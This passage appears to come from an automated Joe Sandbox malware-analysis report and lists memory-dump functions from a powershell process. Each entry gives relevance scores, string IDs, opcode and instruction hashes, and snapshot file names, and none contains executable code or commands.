                                                                              • Opcode ID: 3189bf6debdd22937a14ac94f1ecebcaa90d61e978b1502e36e63046c31e7bc8
                                                                              • Instruction ID: c1c1ff86f83f05616367dca73ab3b104527494f2054e90f139c72a3e2d101001
                                                                              • Opcode Fuzzy Hash: 3189bf6debdd22937a14ac94f1ecebcaa90d61e978b1502e36e63046c31e7bc8
                                                                              • Instruction Fuzzy Hash: 562177F133074B9BDB34456A8950B77AA9ADBC1711F34882AED09CF385DD76C8148360
                                                                              Function 072347D7 Relevance: 3.0, Strings: 2, Instructions: 494COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq
                                                                              • API String ID: 0-1204115232
                                                                              • Opcode ID: 49a870fdb09dd9980d75ed605610cbc89b75fe3c30e10d173a724988599b6ae7
                                                                              • Instruction ID: 6d0840503312450220c0b8788707087dfe928784a34457799dd22e3354d05793
                                                                              • Opcode Fuzzy Hash: 49a870fdb09dd9980d75ed605610cbc89b75fe3c30e10d173a724988599b6ae7
                                                                              • Instruction Fuzzy Hash: 42229EB0A10285CFDB24DF58C591FAABBB2EB85714F1484A9E9095F352CB72EC41CF91
                                                                              Function 0723D319 Relevance: 2.9, Strings: 2, Instructions: 424COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk
                                                                              • API String ID: 0-473956995
                                                                              • Opcode ID: 9f24abbe92a28efaf91e48b3358874bf7e2ce69416e341df38d7628fe760b679
                                                                              • Instruction ID: 86ebe0ad1d93c70f42fcc625ff7c4ac39666083542d98a39ced50006410a652e
                                                                              • Opcode Fuzzy Hash: 9f24abbe92a28efaf91e48b3358874bf7e2ce69416e341df38d7628fe760b679
                                                                              • Instruction Fuzzy Hash: D7124CB0B20215CFDB60CB54CA50BAABBB2FB85314F5084E5E9096B351CB76ED85CF91
                                                                              Function 07230B48 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tPjq$tPjq
                                                                              • API String ID: 0-4117293638
                                                                              • Opcode ID: 09b9e5b9d0f9641708d9409b9147e099b7afac0e5a0a242e8ba297ec4ac7f4da
                                                                              • Instruction ID: 465201b7d93b2ddd9bdb3cfdf966a8d4961288f9cc79f98405a69acf2e69c350
                                                                              • Opcode Fuzzy Hash: 09b9e5b9d0f9641708d9409b9147e099b7afac0e5a0a242e8ba297ec4ac7f4da
                                                                              • Instruction Fuzzy Hash: 8F5149F17643569FCB318AA98810B6BBBA7AF81311F14C87BD549CB292CA75C844C7B1
                                                                              Function 07231001 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq
                                                                              • API String ID: 0-3720491408
                                                                              • Opcode ID: 1e9eba6427fdb2de3b8886a3b1d4a40d166e4a606c2c75afed1a134ca737b65e
                                                                              • Instruction ID: c10bf362d7b1ec63bfc508a244f59eef625ee150a35e44cf958eb0b549f09ff6
                                                                              • Opcode Fuzzy Hash: 1e9eba6427fdb2de3b8886a3b1d4a40d166e4a606c2c75afed1a134ca737b65e
                                                                              • Instruction Fuzzy Hash: E52146F13287CA5FDB3106354D517A23F75CF82600F284497ED44DF292E96A9814C331
                                                                              Function 07233898 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x.xk
                                                                              • API String ID: 0-2157606827
                                                                              • Opcode ID: f9b2fb626a8e2030cfb955f0024e515b1594129983adf5739369786233ba851c
                                                                              • Instruction ID: 1d6e4e3f7ab1254faf7ce9a290d75443c54fb4922b4d2914991f73ab451bd027
                                                                              • Opcode Fuzzy Hash: f9b2fb626a8e2030cfb955f0024e515b1594129983adf5739369786233ba851c
                                                                              • Instruction Fuzzy Hash: D231D270B501009FD724E768CA55BAE7AA3EFC4354F208864E9016F395CE769D46CBE1
                                                                              Function 0671EAB0 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq
                                                                              • API String ID: 0-3676250632
                                                                              • Opcode ID: 8070ead0bb2c7c3f5dd469f0efaf4bea63f7f669a06cf6180328d535598ed84d
                                                                              • Instruction ID: 252d57a680d97991a3590e0cff1198ab67b05a70f0d793b38391128481567e75
                                                                              • Opcode Fuzzy Hash: 8070ead0bb2c7c3f5dd469f0efaf4bea63f7f669a06cf6180328d535598ed84d
                                                                              • Instruction Fuzzy Hash: E6F0F4303843402BD718A775AC50BAF6B57EFC0610F14097CD5065F3E6CD60AC098654
                                                                              Function 0671EABE Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq
                                                                              • API String ID: 0-3676250632
                                                                              • Opcode ID: 440e1a5b02c797066ce75997b6c3f681582a05ee113c12a25485ce3d349306ac
                                                                              • Instruction ID: bc9b7d657ca819920628ccfd4b5097a2ecabf18046ce74424a62a8fac7ce8a03
                                                                              • Opcode Fuzzy Hash: 440e1a5b02c797066ce75997b6c3f681582a05ee113c12a25485ce3d349306ac
                                                                              • Instruction Fuzzy Hash: 81F0F6303443002BD21CAA76AC50F6F7B5BEFC5610F54087CE5065B3DACD60AC098794
                                                                              Function 0671EAC0 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq
                                                                              • API String ID: 0-3676250632
                                                                              • Opcode ID: 78e89060b1cb2863cec3c4d21d95c6278c2e7dcef3e86ea1a5bf39013362ed24
                                                                              • Instruction ID: ea088e092ea8e99c91577fc4af9875b7044942403b2ab30199d4494bc5a6b9f4
                                                                              • Opcode Fuzzy Hash: 78e89060b1cb2863cec3c4d21d95c6278c2e7dcef3e86ea1a5bf39013362ed24
                                                                              • Instruction Fuzzy Hash: 31F0F0303443002BD21CAA66AC50F6F7A5BEFC4610F60087CE5065B3DACEA0AC098698
                                                                              Function 09020868 Relevance: .4, Instructions: 429COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a33abf70441d0a353179728468e5b749b7b3796c061a0f1234791073aa6fda62
                                                                              • Instruction ID: 6a9cbed18e75109d3c2a96e9c7646843a497a083c75317d857f19d47b20c0a5f
                                                                              • Opcode Fuzzy Hash: a33abf70441d0a353179728468e5b749b7b3796c061a0f1234791073aa6fda62
                                                                              • Instruction Fuzzy Hash: E4022974A01219DFDB15CF98D984AAEBBF6FF88310F248559E805AB365C731ED81CB90
                                                                              Function 0671731A Relevance: .3, Instructions: 265COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2771617570b711e07d4f91eba7f4f9bb552e4eefad8f6a5dd70608a118ff8663
                                                                              • Instruction ID: 33e7f49b2e9c26984478abc232c7119c8baaf38a1990ef7b49d005a298c88240
                                                                              • Opcode Fuzzy Hash: 2771617570b711e07d4f91eba7f4f9bb552e4eefad8f6a5dd70608a118ff8663
                                                                              • Instruction Fuzzy Hash: F2A18F35E002489FDB58DFA8D544AADBBB6FF84310F11855AE406AF365DB34ED89CB80
                                                                              Function 07235DE0 Relevance: .2, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 71934422142b31fd315d407119d4098f59a798fe26c1206208289c97dffbcb3b
                                                                              • Instruction ID: 18a4375dbbb370b2700d0a7b6520a15407b9e6d7cba8bf57f01e66c31cb07fb8
                                                                              • Opcode Fuzzy Hash: 71934422142b31fd315d407119d4098f59a798fe26c1206208289c97dffbcb3b
                                                                              • Instruction Fuzzy Hash: 1F713BF1730216DFCB209E7AC94126ABFE5EFC6210F14847AD809DB281EB31D955CBA1
                                                                              Function 09010C4C Relevance: .2, Instructions: 209COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 663dec3f1dcc70b819afe2cfd815da8fe111a47a2dd28775eb95566a9aacb57a
                                                                              • Instruction ID: aba17adb0f806bf41d1a2d48560d25f4dd18d90b1b4e9a90367413abd79fc938
                                                                              • Opcode Fuzzy Hash: 663dec3f1dcc70b819afe2cfd815da8fe111a47a2dd28775eb95566a9aacb57a
                                                                              • Instruction Fuzzy Hash: DD810B34A00204DFCB64CF59C595AAEBBF2BF88314F15C8A9E845AB755C732E981CF60
                                                                              Function 09010C60 Relevance: .2, Instructions: 201COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dbbd8f6009eb6bb23bc8311b126c4da7c3dd1470bf3e4911b0dbef6cdb10afd7
                                                                              • Instruction ID: a2fc2b2b280c1269f62232cca336f808862810f66661382aff248c9fa5bae419
                                                                              • Opcode Fuzzy Hash: dbbd8f6009eb6bb23bc8311b126c4da7c3dd1470bf3e4911b0dbef6cdb10afd7
                                                                              • Instruction Fuzzy Hash: 4B81FB34A00204DFCB64CF59C595AAEBBF2BF88314F15C8A9E845AB755C732E981CF60
                                                                              Function 06717BD6 Relevance: .2, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04f328ab0de2d038502928453528892f08dd69b1be5f83f9b1e49454289e4073
                                                                              • Instruction ID: 4b735eec85c76f13b108273bd25ee5d9842066d0b6f818668d4083b5a939bd2f
                                                                              • Opcode Fuzzy Hash: 04f328ab0de2d038502928453528892f08dd69b1be5f83f9b1e49454289e4073
                                                                              • Instruction Fuzzy Hash: 32715F30E00209DFDB58DFA9D444BADBBF6BF88304F14856AD411AB364DB35AD46CB50
                                                                              Function 06717A53 Relevance: .2, Instructions: 166COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dfc322e8a079f75b97c09926b787082e14c76c4e5c5b9b624d679d75dc8de7f3
                                                                              • Instruction ID: aac372bfc7a84a6d01ab539bd7ea43fac6f2bf0361b8d5ca26508636abc04489
                                                                              • Opcode Fuzzy Hash: dfc322e8a079f75b97c09926b787082e14c76c4e5c5b9b624d679d75dc8de7f3
                                                                              • Instruction Fuzzy Hash: BA617E30A00209CFCB28DF68C484AEDBBF6FF85314F14856AD4069B755DB75AD46CB90
                                                                              Function 09020E28 Relevance: .2, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 043b3f14f8fa930550604aefb626fc3e11bbdaf0635eba19b809e1e6ab9752dd
                                                                              • Instruction ID: 5b75faf4f59e92b22a6365e32d89d4050ddcd0bfa47697d3a76933e74eb3b766
                                                                              • Opcode Fuzzy Hash: 043b3f14f8fa930550604aefb626fc3e11bbdaf0635eba19b809e1e6ab9752dd
                                                                              • Instruction Fuzzy Hash: 2B514030A053949FCB06CF6CC8A09AEBFB1FF4A314B154596E454EB2B6C335AC45CB95
                                                                              Function 06719641 Relevance: .1, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 26cec8b2b134f4a78197c03ce31db15065b7d6aa83226152012dd80d03024ed1
                                                                              • Instruction ID: 3cfcde100bd886daef2d82d929659e0b12a27ac2b8ddd4aabe8e4d919a48cae9
                                                                              • Opcode Fuzzy Hash: 26cec8b2b134f4a78197c03ce31db15065b7d6aa83226152012dd80d03024ed1
                                                                              • Instruction Fuzzy Hash: 8C510935E012489FCB54CFACD490AADFBB1AF88320F14C556E919AB361D731ED42CB90
                                                                              Function 0671B6F0 Relevance: .1, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c3c5396f1b60f47d1e5664b2a1c5ec6d5b1d1bc74a61ce6d0e3126883add22ce
                                                                              • Instruction ID: 611169864de3f9aecdc4ca4dfc7d3c79e5b23965fa4c3c3b2d6e2ffd9ac5c201
                                                                              • Opcode Fuzzy Hash: c3c5396f1b60f47d1e5664b2a1c5ec6d5b1d1bc74a61ce6d0e3126883add22ce
                                                                              • Instruction Fuzzy Hash: 80416D30A002049FDB04DF79C554BAEBBE7EFC8310F18846AD805AB395DA359C46CBA5
                                                                              Function 067177F9 Relevance: .1, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3b4fbf1e921f8869dfd65d12abc76a36054742e49a2dcf1a1c97e133c5939d11
                                                                              • Instruction ID: 62f42912abb086f33c2b1f3f082cfafb50c9924961c0a976ef52088566fc1f11
                                                                              • Opcode Fuzzy Hash: 3b4fbf1e921f8869dfd65d12abc76a36054742e49a2dcf1a1c97e133c5939d11
                                                                              • Instruction Fuzzy Hash: CB417C31A402059FDB599B78C954BA97BF6EF89750F088469E406EB7A0CF34ED42CB90
                                                                              Function 0671B6B7 Relevance: .1, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 902773dccc230bd465e3c3f151a7ee6d330ec18cf1928c6489a1c805a7032d40
                                                                              • Instruction ID: 646a0c3904b6f8944799ebea3281f86a1c3d8dbb3e4fc52925c243a3e6d40c2b
                                                                              • Opcode Fuzzy Hash: 902773dccc230bd465e3c3f151a7ee6d330ec18cf1928c6489a1c805a7032d40
                                                                              • Instruction Fuzzy Hash: 3F413C30A002048FDB08DF79D5547AEBBE7EFC9310F18C46AD805AB3A5DA359C46DB95
                                                                              Function 0671F00C Relevance: .1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf1d77edda12298b0fe5617f64df844b76ae1d040a4f4e2edf39bc7dd676a06b
                                                                              • Instruction ID: c02b2a9f27e37e08ef47abe2ee86d8467bc36c84f34db1ab019b84c815ef2f80
                                                                              • Opcode Fuzzy Hash: cf1d77edda12298b0fe5617f64df844b76ae1d040a4f4e2edf39bc7dd676a06b
                                                                              • Instruction Fuzzy Hash: 52510A34A002499FDB04DF68D444AEEBBF6FF88310F149169D405AB3A5D775EC85CBA0
                                                                              Function 072382FD Relevance: .1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e322cfb95c739f85931b7ed506b6019c07c04a32954a991fc429914b64886c55
                                                                              • Instruction ID: b4d05d77b1c21ff6373bfd5e5988e66c64974762cce9e2a6a079d9727c4965e9
                                                                              • Opcode Fuzzy Hash: e322cfb95c739f85931b7ed506b6019c07c04a32954a991fc429914b64886c55
                                                                              • Instruction Fuzzy Hash: 844124F2A24203CFDB318B64864176A7BA2ABC5644F0884A6F9109F755E736D845CBB1
                                                                              Function 0671B700 Relevance: .1, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1f2d9d6629e57957ff29c455d63024d40d9dcccab6cd38fec224e7b056b8beb
                                                                              • Instruction ID: c7208571804a46c635580b84633a0f4f4d92757d8ec5217ef3afdabaf793f746
                                                                              • Opcode Fuzzy Hash: b1f2d9d6629e57957ff29c455d63024d40d9dcccab6cd38fec224e7b056b8beb
                                                                              • Instruction Fuzzy Hash: B7414C70A002088FDB08DF79C554BAEBBF7EFC8310F18C46AD805AB395DA359C459BA4
                                                                              Function 09021800 Relevance: .1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 36002969d167f0138f579f7c5d886f1b1c263ceb465c71f8a5b4eb760639a802
                                                                              • Instruction ID: 7e63c9e8bfd7de888b13f16788051cbbee72933db8add882fad1c24f3fea3f05
                                                                              • Opcode Fuzzy Hash: 36002969d167f0138f579f7c5d886f1b1c263ceb465c71f8a5b4eb760639a802
                                                                              • Instruction Fuzzy Hash: E2413A74A051199FCB45CF9CC984AAEBBF2FF49320B248658E915EB3A4C735EC41CB90
                                                                              Function 090217F0 Relevance: .1, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 74032300d4411d025785b20594bb22d0b4db08c95145814807eb0060362ca0fd
                                                                              • Instruction ID: 054537490f857c682cba9897528b3cd14efa673275ffad7af2fb268e64644eff
                                                                              • Opcode Fuzzy Hash: 74032300d4411d025785b20594bb22d0b4db08c95145814807eb0060362ca0fd
                                                                              • Instruction Fuzzy Hash: A1415A74A041198FCB45CF9CC980AAEBBF2FF48320B248658E855EB3A4C731EC41CB90
                                                                              Function 09020E19 Relevance: .1, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0d432467a914ed478a2394fb28d2fe37e9373423217a9b8a360ece6da660fbe1
                                                                              • Instruction ID: 26eea7904d69ea856e2f130ee5b90a35e57275956ff876f51f0a289ff400995b
                                                                              • Opcode Fuzzy Hash: 0d432467a914ed478a2394fb28d2fe37e9373423217a9b8a360ece6da660fbe1
                                                                              • Instruction Fuzzy Hash: 90410970A002199FCB44CF98C9849AEBBF2FF48324F248668E815A73A4C735EC51CB90
                                                                              Function 09020858 Relevance: .1, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345320958.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9020000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 54c46c9ab1402744420d1c65693dd2bf8fb936646c1d08effb503e0db8f4f260
                                                                              • Instruction ID: c9aab08830dbffab21429bcb11d79b0ce8408d8ddb5722998ac414d45af87f42
                                                                              • Opcode Fuzzy Hash: 54c46c9ab1402744420d1c65693dd2bf8fb936646c1d08effb503e0db8f4f260
                                                                              • Instruction Fuzzy Hash: 58412E74A016159FCB14CF9CC9849AEBBF2FF89320B248659E855E73A4C731EC81CB50
                                                                              Function 06712BB1 Relevance: .1, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f894d749eab1a7ecfc19a676595f9138cdf88425a719eb6fc0f7abd82356177
                                                                              • Instruction ID: 3ca939c90f5ba0a5525af89cc423f38dce10a90cd87a1a6d68ab9e9f36de7c98
                                                                              • Opcode Fuzzy Hash: 3f894d749eab1a7ecfc19a676595f9138cdf88425a719eb6fc0f7abd82356177
                                                                              • Instruction Fuzzy Hash: 9B416674A002099FCB09CF58C5949BEFBB1FF48310B25825AD951AB366C732FD90CBA4
                                                                              Function 06717810 Relevance: .1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b829fe27934164c056cc463ad2f4b613f28e1cc5f1c85bbf9aad48e0e2cdcff9
                                                                              • Instruction ID: 550ac6c8f1fb3312dcee007139c0c02986eebc5052dc662dc785c16615fdd9cb
                                                                              • Opcode Fuzzy Hash: b829fe27934164c056cc463ad2f4b613f28e1cc5f1c85bbf9aad48e0e2cdcff9
                                                                              • Instruction Fuzzy Hash: BF414930A402158FDB589B78C954AAD7BB6EF88750F048469E406AB7A0CF34ED42CB90
                                                                              Function 07230EB0 Relevance: .1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dc53cc504bbf9027c437227e01749fc2b48799b7f21f9de7ddaedd696f9d04a
                                                                              • Instruction ID: 12e23cc7fae3930333b0b228e1f32e11dfa4af469210f7199af32add7ed5fa8c
                                                                              • Opcode Fuzzy Hash: 6dc53cc504bbf9027c437227e01749fc2b48799b7f21f9de7ddaedd696f9d04a
                                                                              • Instruction Fuzzy Hash: 86216BF13203169BC774557A8990B3BBA97ABC5705F24883AA506DB3C1DE76D840C3B1
                                                                              Function 07235DC1 Relevance: .1, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
